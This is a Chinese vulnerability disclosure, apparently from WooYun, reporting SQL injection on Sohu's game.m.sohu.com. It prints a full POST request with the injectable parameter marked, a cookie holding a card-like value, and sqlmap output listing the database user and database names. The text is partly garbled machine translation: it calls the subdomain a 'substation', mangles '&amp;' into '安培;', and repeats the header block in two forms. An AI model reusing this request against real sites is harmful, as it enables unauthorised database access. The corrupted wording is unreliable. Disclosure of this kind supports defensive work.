搜狐分站存在SQL注入

漏洞标题 搜狐分站存在SQL注入 相关厂商 搜狐 漏洞作者 Vinc 提交时间 2016-05-02 20:43 公开时间 2016-06-17 00:00 漏洞类型 SQL注射漏洞 危害等级 高 自…

漏洞标题 搜狐变电站有SQL注入 相关制造商 搜狐 漏洞作者 时Vinc 提交时间 2016-05-02 20: 43 公共时间 2016-06-17 00: 00 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 12 漏洞状态 制造商已确认 标签标签 Sql注入 漏洞详细信息 网站:game.m.sohu.com POST的内容如下: POST/api/sogougift/HTTP/1.1 内容长度: 89 内容类型: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer:http://game.m.sohu.com Cookie: _smuid=AHbLM0wQqbLil8QXm3Q3lx; game_user=1; IPLOC=CN1100; sg_gift_id1839=1839; card_no1839=3AWQ-NTY7-DEZ5-Z3SB 主机: game.m.sohu.com 连接:保持活动状态 Accept-Encoding: gzip,deflate 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML,与Gecko一样)Chrome/41.0.2228.0 Safari/537.21 接受: */* Gift_id=1839&安培; Smuid的=* 漏洞证明: Web应用程序技术: Nginx 后端DBMS: MySQL>=5.0.0 [17: 49: 09] [INFO]获取当前用户 [17: 49: 09] [警告]以单线程模式运行。请考虑使用o Ption'--threads'用于更快的数据检索 [17: 49: 09] [INFO]检索到: game_shouyou @% 当前用户:'game_shouyou @%' 当前数据库:'game_shouyou' 可用数据库[4]: [*] game_jifen [*] game_shouyou [*] information_schema [*]测试 修理计划: 。 版权声明:请注明出处Vinc @乌云